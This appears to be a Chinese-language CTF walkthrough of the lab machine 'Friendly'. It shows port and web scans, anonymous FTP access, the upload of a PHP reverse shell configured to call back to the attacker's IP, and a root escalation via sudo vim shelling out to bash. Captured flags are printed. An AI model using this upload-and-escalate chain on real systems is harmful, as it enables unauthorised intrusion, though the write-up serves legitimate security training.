Friendly
端口扫描
信息搜集
rustscan -a 172.20.10.7 -- -A
Open 172.20.10.7:21
Open 172.20.10.7:80
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
80/tcp open http syn-ack Apache httpd 2.4.54 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.54 (Debian)
|_http-title: Apache2 Debian Default Page: It works
目录扫描
gobuster dir -u http://172.20.10.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png
没发现啥东西。。
漏洞扫描
nikto -h http://172.20.10.7
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 172.20.10.7
+ Target Hostname: 172.20.10.7
+ Target Port: 80
+ Start Time: 2024-04-14 04:03:49 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.54 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 29e5, size: 5f55fa2250a77, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2024-04-14 04:04:06 (GMT-4) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
漏洞发现
踩点
访问敏感端口
使用信息扫描出的结果匿名登录一下,Anonymous FTP
┌──(kali💀kali)-[~/temp/Friendly]
└─$ ftp 172.20.10.7
Connected to 172.20.10.7.
220 ProFTPD Server (friendly) [::ffff:172.20.10.7]
Name (172.20.10.7:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||10902|)
150 Opening ASCII mode data connection for file list
drwxrwxrwx 2 root root 4096 Mar 11 2023 .
drwxrwxrwx 2 root root 4096 Mar 11 2023 ..
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
226 Transfer complete
ftp> get index.html
local: index.html remote: index.html
229 Entering Extended Passive Mode (|||1376|)
150 Opening BINARY mode data connection for index.html (10725 bytes)
100% |***********************************************************************************************************| 10725 38.30 MiB/s 00:00 ETA
226 Transfer complete
10725 bytes received in 00:00 (8.22 MiB/s)
ftp> exit
221 Goodbye.
上传反弹shell
发现正是主页,尝试上传反弹shell
┌──(kali💀kali)-[~/temp/Friendly]
└─$ head revershell.php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '172.20.10.8'; // You have changed this
$port = 1234; // And this
$chunk_size = 1400;
┌──(kali💀kali)-[~/temp/Friendly]
└─$ ftp 172.20.10.7
Connected to 172.20.10.7.
220 ProFTPD Server (friendly) [::ffff:172.20.10.7]
Name (172.20.10.7:kali): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put revershell.php
local: revershell.php remote: revershell.php
229 Entering Extended Passive Mode (|||28867|)
150 Opening BINARY mode data connection for revershell.php
100% |***********************************************************************************************************| 3909 26.81 MiB/s 00:00 ETA
226 Transfer complete
3909 bytes sent in 00:00 (4.61 MiB/s)
ftp> exit
221 Goodbye.
访问一下http://172.20.10.7/revershell.php
触发:
提权
信息搜集
(remote) www-data@friendly:/$ pwd
/
(remote) www-data@friendly:/$ cd /var/www/html
(remote) www-data@friendly:/var/www/html$ ls -la
total 24
drwxrwxrwx 2 root root 4096 Apr 14 04:11 .
drwxr-xr-x 3 root root 4096 Feb 21 2023 ..
-rw-r--r-- 1 root root 10725 Feb 23 2023 index.html
-rw-r--r-- 1 ftp nogroup 3909 Apr 14 04:11 revershell.php
(remote) www-data@friendly:/var/www/html$ cd ..
(remote) www-data@friendly:/var/www$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Feb 21 2023 .
drwxr-xr-x 12 root root 4096 Feb 21 2023 ..
drwxrwxrwx 2 root root 4096 Apr 14 04:11 html
(remote) www-data@friendly:/var/www$ cd ..;ls -la
total 48
drwxr-xr-x 12 root root 4096 Feb 21 2023 .
drwxr-xr-x 18 root root 4096 Mar 11 2023 ..
drwxr-xr-x 2 root root 4096 Mar 11 2023 backups
drwxr-xr-x 10 root root 4096 Feb 21 2023 cache
drwxr-xr-x 26 root root 4096 Feb 21 2023 lib
drwxrwsr-x 2 root staff 4096 Sep 3 2022 local
lrwxrwxrwx 1 root root 9 Feb 21 2023 lock -> /run/lock
drwxr-xr-x 8 root root 4096 Apr 14 04:00 log
drwxrwsr-x 2 root mail 4096 Feb 21 2023 mail
drwxr-xr-x 2 root root 4096 Feb 21 2023 opt
lrwxrwxrwx 1 root root 4 Feb 21 2023 run -> /run
drwxr-xr-x 4 root root 4096 Feb 21 2023 spool
drwxrwxrwt 2 root root 4096 Apr 14 04:00 tmp
drwxr-xr-x 3 root root 4096 Feb 21 2023 www
(remote) www-data@friendly:/var$ mail
bash: mail: command not found
(remote) www-data@friendly:/var$ cd backups/
(remote) www-data@friendly:/var/backups$ ls -la
total 20
drwxr-xr-x 2 root root 4096 Mar 11 2023 .
drwxr-xr-x 12 root root 4096 Feb 21 2023 ..
-rw-r--r-- 1 root root 8325 Feb 21 2023 apt.extended_states.0
(remote) www-data@friendly:/var/backups$ cd /home
(remote) www-data@friendly:/home$ ls -la
total 12
drwxr-xr-x 3 root root 4096 Feb 21 2023 .
drwxr-xr-x 18 root root 4096 Mar 11 2023 ..
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 2023 RiJaba1
(remote) www-data@friendly:/home$ cd RiJaba1/
(remote) www-data@friendly:/home/RiJaba1$ ls -la
ctotal 24
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 2023 .
drwxr-xr-x 3 root root 4096 Feb 21 2023 ..
lrwxrwxrwx 1 RiJaba1 RiJaba1 9 Feb 23 2023 .bash_history -> /dev/null
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 2023 CTF
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 2023 Private
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Feb 21 2023 YouTube
-r--r--r-- 1 RiJaba1 RiJaba1 33 Mar 11 2023 user.txt
(remote) www-data@friendly:/home/RiJaba1$ cat user.txt
b8cff8c9008e1c98a1f2937b4475acd6
(remote) www-data@friendly:/home/RiJaba1$ ls -F
CTF/ Private/ YouTube/ user.txt
(remote) www-data@friendly:/home/RiJaba1$ cd CTF
(remote) www-data@friendly:/home/RiJaba1/CTF$ ls -la
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 2023 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 2023 ..
-r--r--r-- 1 RiJaba1 RiJaba1 21 Mar 11 2023 ...
(remote) www-data@friendly:/home/RiJaba1/CTF$ cd ...
bash: cd: ...: Not a directory
(remote) www-data@friendly:/home/RiJaba1/CTF$ ls -F
(remote) www-data@friendly:/home/RiJaba1/CTF$ file ...
...: ASCII text
(remote) www-data@friendly:/home/RiJaba1/CTF$ cat ...
How did you find me?
(remote) www-data@friendly:/home/RiJaba1/CTF$ cd ..
(remote) www-data@friendly:/home/RiJaba1$ cd Private/
(remote) www-data@friendly:/home/RiJaba1/Private$ ls -la
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Mar 11 2023 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 2023 ..
-r--r--r-- 1 RiJaba1 RiJaba1 45 Mar 11 2023 targets.txt
(remote) www-data@friendly:/home/RiJaba1/Private$ cat targets.txt
U2hlbGxEcmVkZAp4ZXJvc2VjCnNNTApib3lyYXMyMDAK
(remote) www-data@friendly:/home/RiJaba1/Private$ cd ../YouTube/
(remote) www-data@friendly:/home/RiJaba1/YouTube$ ls -la
total 12
drwxr-xr-x 2 RiJaba1 RiJaba1 4096 Feb 21 2023 .
drwxr-xr-x 5 RiJaba1 RiJaba1 4096 Mar 11 2023 ..
-r--r--r-- 1 RiJaba1 RiJaba1 41 Feb 21 2023 ideas.txt
(remote) www-data@friendly:/home/RiJaba1/YouTube$ cat ideas.txt
What're you reading? Have you hacked me?
尝试解码一下字符串:
什么玩意:
继续信息搜集:
(remote) www-data@friendly:/home/RiJaba1/YouTube$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/mount
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
(remote) www-data@friendly:/home/RiJaba1/YouTube$ sudo -l
Matching Defaults entries for www-data on friendly:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on friendly:
(ALL : ALL) NOPASSWD: /usr/bin/vim
尝试提权:
打开vim
以后,输入命令!/bin/bash
即可执行!!
(remote) www-data@friendly:/home/RiJaba1/YouTube$ sudo /usr/bin/vim
root@friendly:/home/RiJaba1/YouTube# cd /root
root@friendly:~# ls -la
total 28
drwx------ 3 root root 4096 Mar 11 2023 .
drwxr-xr-x 18 root root 4096 Mar 11 2023 ..
lrwxrwxrwx 1 root root 9 Feb 23 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwxr-xr-x 3 root root 4096 Feb 21 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-r-xr-xr-x 1 root root 509 Mar 11 2023 interfaces.sh
-r-------- 1 root root 24 Mar 11 2023 root.txt
root@friendly:~# cat interfaces.sh
#!/bin/bash
# By RiJaba1
interfaces=$(ip link | awk -F: '$0 !~ "lo|vir|^[^0-9]"{print $2}')
new_interfaces=""
for interface in $interfaces; do
if ! grep -q "^iface $interface" /etc/network/interfaces; then
echo "" >> /etc/network/interfaces
echo "auto $interface" >> /etc/network/interfaces
echo "iface $interface inet dhcp" >> /etc/network/interfaces
new_interfaces="$new_interfaces $interface"
fi
done
if [ -n "$new_interfaces" ]; then
sleep 15
reboot
fi
root@friendly:~# cat root.txt
Not yet! Find root.txt.
额,还没有发现flag。。。。
root@friendly:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:a2:9f:c0 brd ff:ff:ff:ff:ff:ff
inet 172.20.10.7/28 brd 172.20.10.15 scope global dynamic enp0s3
valid_lft 85094sec preferred_lft 85094sec
inet6 fe80::a00:27ff:fea2:9fc0/64 scope link
valid_lft forever preferred_lft forever
root@friendly:~# find / -name root.txt 2>/dev/null
/var/log/apache2/root.txt
/root/root.txt
root@friendly:~# cat /var/log/apache2/root.txt
66b5c58f3e83aff307441714d3e28d2f
找到flag!!!!